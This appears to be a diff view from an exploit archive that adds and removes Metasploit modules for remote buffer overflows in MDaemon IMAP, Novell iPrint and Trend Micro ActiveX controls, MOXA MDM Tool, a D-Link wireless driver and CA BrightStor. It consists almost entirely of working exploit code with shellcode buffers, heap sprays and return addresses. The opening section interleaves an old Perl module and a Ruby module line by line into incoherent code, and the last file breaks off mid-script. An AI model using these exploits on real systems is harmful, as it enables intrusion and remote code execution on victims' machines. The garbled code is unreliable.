# version of the Framework can always be obtained from metasploit.com.
# $Id: mdaemon_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $
##
package Msf::Exploit::mdaemon_imap_cram_md5;
use strict;
use base 'Msf::Exploit';
use Msf::Socket::Tcp;
use Pex::Text;
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
my $advanced = { };
require 'msf/core'
my $info = {
'Name' => 'Mdaemon 8.0.3 IMAD CRAM-MD5 Authentication Overflow',
'Version' => '$Revision: 1.2 $',
'Authors' => [ 'anonymous' ],
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
'Arch' => [ 'x86' ],
'OS' => [ 'win32'],
'Priv' => 1,
include Msf::Exploit::Remote::Imap
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 143],
},
def initialize(info = {})
super(update_info(info,
'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow',
'Description' => %q{
This module exploits a buffer overflow in the CRAM-MD5
authentication of the MDaemon IMAP service. This
vulnerability was discovered by Muts.
},
'Author' => [ 'anonymous' ],
'License' => BSD_LICENSE,
'Version' => '$Revision: 9583 $',
'References' =>
[
[ 'CVE', '2004-1520'],
[ 'OSVDB', '11838'],
[ 'BID', '11675'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'MDaemon IMAP 8.0.3 Windows XP SP2', { } ],
],
'DisclosureDate' => 'Nov 12 2004',
'DefaultTarget' => 0))
end
'Payload' =>
{
'Prepend' => "\x81\xc4\x1f\xff\xff\xff\x44", # make stack happy
'Space' => 500,
'BadChars' => "\x00",
},
def exploit
connect
'Description' => Pex::Text::Freeform(qq{
This module exploits a buffer overflow in the CRAM-MD5 authentication of the
MDaemon IMAP service. This vulnerability was discovered by Muts.
}),
print_status("Asking for CRAM-MD5 authentication...")
sock.put("a001 authenticate cram-md5\r\n")
res = sock.get_once
'Refs' =>
[
['OSVDB', '11838'],
['CVE', '2004-1520'],
['BID', '11675'],
],
'Targets' =>
[
['MDaemon IMAP 8.0.3 Windows XP SP2'],
],
print_status("Received CRAM-MD5 answer: #{res.chomp}")
# Magic no return-address exploitation ninjaness!
buf = 'AAAA' + payload.encoded + make_nops(258) + "\xe9\x05\xfd\xff\xff"
req = Rex::Text.encode_base64(buf) + "\r\n"
sock.put(req)
res = sock.get_once
'Keys' => ['mdaemon'],
};
print_status("Received authentication reply: #{res.chomp}")
print_status("Sending LOGOUT to close the thread and trigger an exception")
sock.put("a002 LOGOUT\r\n")
res = sock.get_once
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
print_status("Received LOGOUT reply: #{res.chomp}")
select(nil,nil,nil,1)
return($self);
}
handler
disconnect
end
sub Exploit {
my $self = shift;
my $targetHost = $self->GetVar('RHOST');
my $targetPort = $self->GetVar('RPORT');
my $targetIndex = $self->GetVar('TARGET');
my $encodedPayload = $self->GetVar('EncodedPayload');
my $shellcode = $encodedPayload->Payload;
my $target = $self->Targets->[$targetIndex];
if (! $self->InitNops(128)) {
$self->PrintLine("[*] Failed to initialize the NOP module.");
return;
}
my $sock = Msf::Socket::Tcp->new(
'PeerAddr' => $targetHost,
'PeerPort' => $targetPort,
);
if($sock->IsError) {
$self->PrintLine('Error creating socket: ' . $sock->GetError);
return;
}
my $resp = $sock->Recv(-1);
chomp($resp);
$self->PrintLine('[*] Got Banner: ' . $resp);
my $req = "a001 authenticate cram-md5\r\n";
$sock->Send($req);
$self->PrintLine('[*] CRAM-MD5 authentication method asked');
$resp = $sock->Recv(-1);
chomp($resp);
$self->PrintLine('[*] Got CRAM-MD5 answer: ' . $resp);
# Magic no return-address exploitation ninjaness!
$req = "AAAA" . $shellcode . $self->MakeNops(258) . "\xe9\x05\xfd\xff\xff";
$req = Pex::Text::Base64Encode($req, '') . "\r\n";
$sock->Send($req);
$self->PrintLine('[*] CRAM-MD5 authentication with shellcode sent');
$resp = $sock->Recv(-1);
chomp($resp);
$self->PrintLine('[*] Got authentication reply: ' . $resp);
$req = "a002 LOGOUT\r\n";
$sock->Send($req);
$self->PrintLine('[*] Send LOGOUT to close the thread and trigger an exception');
$resp = $sock->Recv(-1);
chomp($resp);
$self->PrintLine('[*] Got LOGOUT reply: ' . $resp);
$self->PrintLine("[*] Overflow request sent, sleeping for one second");
select(undef, undef, undef, 1);
$self->Handler($sock);
return;
}
1;
# milw0rm.com [2005-08-12]
end

37
platforms/windows/remote/15072.rb
View file

@ -1,3 +1,14 @@
##
# $Id: novelliprint_callbackurl.rb 10429 2010-09-21 18:46:29Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# novelliprint_callbackurl.rb
#
@ -39,13 +50,13 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Novell iPrint Client ActiveX Control call-back-url Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42.
When sending an overly long string to the 'call-back-url' parameter in an
op-client-interface-version action of ienipp.ocx an attacker may be able to
execute arbitrary code.
When sending an overly long string to the 'call-back-url' parameter in an
op-client-interface-version action of ienipp.ocx an attacker may be able to
execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancer <mtrancer[at]gmail.com' ],
'Version' => '$Revision:$',
'Version' => '$Revision: 10429 $',
'References' =>
[
[ 'CVE', '2010-1527' ],
@ -85,15 +96,15 @@ class Metasploit3 < Msf::Exploit::Remote
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Setup exploit buffers
nops = Rex::Text.to_unescape([target.ret].pack('V'))
ret = [target.ret].pack('V')
ret = ret * 250
blocksize = 0x40000
fillto = 500
fillto = 500
offset = target['Offset']
# ActiveX parameters
clsid = "36723F97-7AA0-11D4-8919-FF2D71D0D32C"
@ -109,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
html = %Q|<html>
html = %Q|<html>
<script>
var #{j_shellcode} = unescape('#{shellcode}');
var #{j_nops} = unescape('#{nops}');
@ -120,13 +131,13 @@ var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace});
var #{j_block} = #{j_nops}.substring(0,#{j_nops}.length - #{j_slackspace});
while (#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
var #{j_memory} = new Array();
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode};
}
}
</script>
<object classid='clsid:#{clsid}' id='#{ienipp}'>
<param name='operation' value='op-client-interface-version' />
<param name='result-type' value='url' />
<param name='operation' value='op-client-interface-version' />
<param name='result-type' value='url' />
<param name='call-back-url' value='#{ret}' />
</object>
</html>|
@ -140,4 +151,4 @@ for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
handler(cli)
end
end
end

35
platforms/windows/remote/15168.rb
View file

@ -1,3 +1,14 @@
##
# $Id: trendmicro_extsetowner.rb 10538 2010-10-04 04:26:09Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# trendmicro_extsetowner.rb
#
@ -37,14 +48,14 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in Trend Micro
Internet Security Pro 2010 ActiveX.
When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll
an attacker may be able to execute arbitrary code.
This module exploits a remote code execution vulnerability in Trend Micro
Internet Security Pro 2010 ActiveX.
When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancer <mtrancer[at]gmail.com' ],
'Version' => '$Revision:$',
'Version' => '$Revision: 10538 $',
'References' =>
[
[ 'CVE', '2010-3189' ],
@ -64,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x00C750A1 } ]
[ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x00C750A1 } ] #??
],
'DisclosureDate' => 'Aug 25 2010',
'DefaultTarget' => 0))
@ -84,13 +95,13 @@ class Metasploit3 < Msf::Exploit::Remote
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Setup exploit buffers
nops = Rex::Text.to_unescape(make_nops(4))
ret = Rex::Text.to_unescape([target.ret].pack('V'))
blocksize = 0x40000
fillto = 500
fillto = 500
# ActiveX parameters
clsid = "15DBC3F9-9F0A-472E-8061-043D9CEC52F0"
@ -118,9 +129,9 @@ var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace});
var #{j_block} = #{j_nops}.substring(0,#{j_nops}.length - #{j_slackspace});
while (#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
var #{j_memory} = new Array();
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode};
}
}
#{ufpbctrl}.extSetOwner(unescape('#{ret}'));
</script>
</html>|
@ -133,4 +144,4 @@ for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
# Handle the payload
handler(cli)
end
end
end

126
platforms/windows/remote/16381.rb
View file

@ -1,82 +1,76 @@
##
# $Id: moxa_mdmtool.rb 11039 2010-11-14 19:03:24Z jduck $
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class MetasploitModule < Msf::Exploit::Remote
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
Rank = GreatRanking
include Msf::Exploit::Remote::TcpServer
include Msf::Exploit::Remote::Seh
include Msf::Exploit::Remote::TcpServer
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'MOXA Device Manager Tool 2.1 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.
When sending a specially crafted MDMGw (MDM2_Gateway) response, an
attacker may be able to execute arbitrary code.
},
'Author' => [ 'Ruben Santamarta', 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2010-4741'],
[ 'OSVDB', '69027'],
[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ],
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[ 'MOXA MDM Tool 2.1', { 'Ret' => 0x1016bca7 } ], # UTU.dll / keeping the rop version for me...
],
'Privileged' => false,
'DisclosureDate' => 'Oct 20 2010',
'DefaultTarget' => 0))
def initialize(info = {})
super(update_info(info,
'Name' => 'MOXA Device Manager Tool 2.1 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.
When sending a specially crafted MDMGw (MDM2_Gateway) response, an
attacker may be able to execute arbitrary code.
},
'Author' => [ 'Ruben Santamarta', 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11039 $',
'References' =>
[
[ 'OSVDB', '69027'],
[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=' ],
[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICS-Alert-10-293-02.pdf' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'MOXA MDM Tool 2.1', { 'Ret' => 0x1016bca7 } ], # UTU.dll / keeping the rop version for me...
],
'Privileged' => false,
'DisclosureDate' => 'Oct 20 2010',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 54321 ])
], self.class)
end
register_options(
[
OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 54321 ])
], self.class)
end
def on_client_connect(client)
def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
return if ((p = regenerate_payload(client)) == nil)
client.get_once
client.get_once
sploit = rand_text_alpha_upper(18024)
sploit = rand_text_alpha_upper(18024)
sploit[0, 4] = [0x29001028].pack('V')
sploit[472, payload.encoded.length] = payload.encoded
sploit[1072, 8] = generate_seh_record(target.ret)
sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-550").encode_string
sploit[0, 4] = [0x29001028].pack('V')
sploit[472, payload.encoded.length] = payload.encoded
sploit[1072, 8] = generate_seh_record(target.ret)
sploit[1080, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-550").encode_string
client.put(sploit)
client.put(sploit)
handler(client)
handler(client)
service.close_client(client)
service.close_client(client)
end
end
end
end

202
platforms/windows/remote/16386.rb
View file

@ -1,202 +0,0 @@
##
# $Id: dlink_wifi_rates.rb 9670 2010-07-03 03:19:07Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = LowRanking
include Msf::Exploit::Lorcon2
include Msf::Exploit::KernelMode
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link DWL-G132 Wireless Driver Beacon Rates Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the A5AGU.SYS driver provided
with the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow
allows remote code execution in kernel mode. The stack buffer overflow is triggered
when a 802.11 Beacon frame is received that contains a long Rates information
element. This exploit was tested with version 1.0.1.41 of the
A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer
versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340
adapter and appear to resolve this flaw, but D-Link does not offer an updated
driver for the DWL-G132. Since this vulnerability is exploited via beacon frames,
all cards within range of the attack will be affected. The tested adapter used
a MAC address in the range of 00:11:95:f2:XX:XX.
Vulnerable clients will need to have their card in a non-associated state
for this exploit to work. The easiest way to reproduce this bug is by starting
the exploit and then accessing the Windows wireless network browser and
forcing it to refresh.
D-Link was NOT contacted about this flaw. A search of the SecurityFocus
database indicates that D-Link has not provided an official patch or
solution for any of the seven flaws listed at the time of writing:
(BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).
As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the
DWL-G132 driver (v1.21).
This module depends on the Lorcon2 library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},
'Author' =>
[
'hdm', # discovery, exploit dev
'skape', # windows kernel ninjitsu
'Johnny Cache <johnnycsh [at] 802.11mercenary.net>' # making all of this possible
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9670 $',
'References' =>
[
['CVE', '2006-6055'],
['OSVDB', '30296'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-13-11-2006.html'],
['URL', 'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
# Its a beautiful day in the neighborhood...
'Space' => 1000
},
'Platform' => 'win',
'Targets' =>
[
# Windows XP SP2 with the latest updates
# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
[ 'Windows XP SP2 (5.1.2600.2122), A5AGU.sys 1.0.1.41',
{
'Ret' => 0x8066662c, # jmp edi
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
'Recovery' => 'idlethread_restart',
'KiIdleLoopAddress' => 0x804dbb27,
}
}
}
],
# Windows XP SP2 install media, no patches
# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
[ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41',
{
'Ret' => 0x804f16eb, # jmp edi
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
'Recovery' => 'idlethread_restart',
'KiIdleLoopAddress' => 0x804dc0c7,
}
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 13 2006'))
register_options(
[
OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60])
], self.class)
end
def exploit
open_wifi
stime = Time.now.to_i
rtime = datastore['RUNTIME'].to_i
count = 0
print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...")
while (stime + rtime > Time.now.to_i)
wifi.write(create_beacon)
select(nil, nil, nil, 0.10) if (count % 100 == 0)
count += 1
# Exit if we get a session
break if session_created?
end
print_status("Completed sending beacons.")
end
#
# The following research was provided by Gil Dabah of ZERT
#
# The long rates field bug can be triggered three different ways (at least):
# 1) Send a single rates IE with valid rates up front and long data
# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data
# 3) Send two IE rates fields, with the second one containing the long data (this exploit)
#
def create_beacon
ssid = rand_text_alphanumeric(6)
bssid = ("\x00" * 2) + rand_text(4)
src = ("\x90" * 4) + "\xeb\x2b"
seq = [rand(255)].pack('n')
buff = rand_text(75)
buff[0, 2] = "\xeb\x49"
buff[71, 4] = [target.ret].pack('V')
frame =
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
src + # src
bssid + # bssid
seq + # seq
rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
"\x00\x05" + # capability flags
# ssid tag
"\x00" + ssid.length.chr + ssid +
# supported rates
"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
# current channel
"\x03" + "\x01" + channel.chr +
# eip was his name-o
"\x01" + buff.length.chr + buff +
payload.encoded
return frame
end
end

123
platforms/windows/remote/16417.rb
View file

@ -1,89 +1,84 @@
##
# $Id: tape_engine_8A.rb 10551 2010-10-05 12:38:46Z swtornio $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
Rank = AverageRanking
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::DCERPC
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow
the buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10551 $',
'References' =>
[
[ 'OSVDB', '68330'],
[ 'URL', 'http://www.metasploit.com/users/mc' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'BrightStor ARCserve r11.5/Windows 2003', { 'Ret' => 0x28eb6493 } ],
],
'DisclosureDate' => 'Oct 4 2010',
'DefaultTarget' => 0))
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow
the buffer and execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '68330'],
[ 'URL', 'http://www.metasploit.com/users/mc' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'BrightStor ARCserve r11.5/Windows 2003', { 'Ret' => 0x28eb6493 } ],
],
'DisclosureDate' => 'Oct 4 2010',
'DefaultTarget' => 0))
register_options([ Opt::RPORT(6502) ], self.class)
end
register_options([ Opt::RPORT(6502) ], self.class)
end
def exploit
def exploit
connect
connect
handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
request = "\x00\x04\x08\x0c\x05\x00\x00\x00\x00\x00"
request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
request = "\x00\x04\x08\x0c\x05\x00\x00\x00\x00\x00"
request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
dcerpc.call(0x2B, request)
dcerpc.call(0x2B, request)
sploit = NDR.long(4)
sploit << NDR.string(rand_text_alpha_upper(1002) + [target.ret].pack('V') + payload.encoded + "\x00")
sploit = NDR.long(4)
sploit << NDR.string(rand_text_alpha_upper(1002) + [target.ret].pack('V') + payload.encoded + "\x00")
print_status("Trying target #{target.name}...")
print_status("Trying target #{target.name}...")
begin
dcerpc_call(0x8A, sploit)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end
begin
dcerpc_call(0x8A, sploit)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end
handler
disconnect
handler
disconnect
end
end
end
=begin
@ -94,4 +89,4 @@ long sub_100707D0 (
[in] long arg_2,
[in][ref][string] char * arg_3
);
=end
=end

83
platforms/windows/remote/16477.rb
View file

@ -1,83 +0,0 @@
##
# $Id: mdaemon_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Imap
def initialize(info = {})
super(update_info(info,
'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow',
'Description' => %q{
This module exploits a buffer overflow in the CRAM-MD5
authentication of the MDaemon IMAP service. This
vulnerability was discovered by Muts.
},
'Author' => [ 'anonymous' ],
'License' => BSD_LICENSE,
'Version' => '$Revision: 9583 $',
'References' =>
[
[ 'CVE', '2004-1520'],
[ 'OSVDB', '11838'],
[ 'BID', '11675'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'MDaemon IMAP 8.0.3 Windows XP SP2', { } ],
],
'DisclosureDate' => 'Nov 12 2004',
'DefaultTarget' => 0))
end
def exploit
connect
print_status("Asking for CRAM-MD5 authentication...")
sock.put("a001 authenticate cram-md5\r\n")
res = sock.get_once
print_status("Received CRAM-MD5 answer: #{res.chomp}")
# Magic no return-address exploitation ninjaness!
buf = 'AAAA' + payload.encoded + make_nops(258) + "\xe9\x05\xfd\xff\xff"
req = Rex::Text.encode_base64(buf) + "\r\n"
sock.put(req)
res = sock.get_once
print_status("Received authentication reply: #{res.chomp}")
print_status("Sending LOGOUT to close the thread and trigger an exception")
sock.put("a002 LOGOUT\r\n")
res = sock.get_once
print_status("Received LOGOUT reply: #{res.chomp}")
select(nil,nil,nil,1)
handler
disconnect
end
end

154
platforms/windows/remote/16501.rb
View file

@ -1,154 +0,0 @@
##
# $Id: novelliprint_callbackurl.rb 10429 2010-09-21 18:46:29Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# novelliprint_callbackurl.rb
#
# Novell iPrint Client ActiveX Control call-back-url Buffer Overflow exploit for the Metasploit Framework
#
# Exploit successfully tested on the following platforms:
# - Novell iPrint Client 5.40 on Internet Explorer 7, Windows XP SP3
# - Novell iPrint Client 5.42 on Internet Explorer 7, Windows XP SP3
# - Novell iPrint Client 5.42 on Internet Explorer 7, Windows Vista SP2
#
# ienipp.ocx version tested:
# File Version: 5.4.0.0 and 5.4.2.0
# ClassID: 36723F97-7AA0-11D4-8919-FF2D71D0D32C
# RegKey Safe for Script: True
# RegKey Safe for Init: True
# KillBitSet: False
#
# References:
# - CVE-2010-1527
# - OSVDB 67411
# - http://secunia.com/secunia_research/2010-104/ - Original advisory by Carsten Eiram, Secunia Research
# - http://www.exploit-db.com/exploits/15042/ - MOAUB #19 exploit
# - http://www.exploit-db.com/moaub-19-novell-iprint-client-browser-plugin-call-back-url-stack-overflow/ - MOAUB #14 binary analysis
# - http://www.rec-sec.com/2010/09/21/novell-iprint-callbackurl-buffer-overflow-exploit/ - Metasploit exploit by Trancer, Recognize-Security
#
# Trancer
# http://www.rec-sec.com
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell iPrint Client ActiveX Control call-back-url Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42.
When sending an overly long string to the 'call-back-url' parameter in an
op-client-interface-version action of ienipp.ocx an attacker may be able to
execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancer <mtrancer[at]gmail.com' ],
'Version' => '$Revision: 10429 $',
'References' =>
[
[ 'CVE', '2010-1527' ],
[ 'OSVDB', '67411'],
[ 'URL', 'http://secunia.com/secunia_research/2010-104/' ], # Carsten Eiram, Secunia Research
[ 'URL', 'http://www.exploit-db.com/exploits/15042/' ], # MOAUB #19
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
],
'DisclosureDate' => 'Aug 20 2010',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Setup exploit buffers
nops = Rex::Text.to_unescape([target.ret].pack('V'))
ret = [target.ret].pack('V')
ret = ret * 250
blocksize = 0x40000
fillto = 500
offset = target['Offset']
# ActiveX parameters
clsid = "36723F97-7AA0-11D4-8919-FF2D71D0D32C"
# Randomize the javascript variable names
ienipp = rand_text_alpha(rand(100) + 1)
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_ret = rand_text_alpha(rand(100) + 1)
j_headersize = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_block = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
html = %Q|<html>
<script>
var #{j_shellcode} = unescape('#{shellcode}');
var #{j_nops} = unescape('#{nops}');
var #{j_headersize} = 20;
var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace});
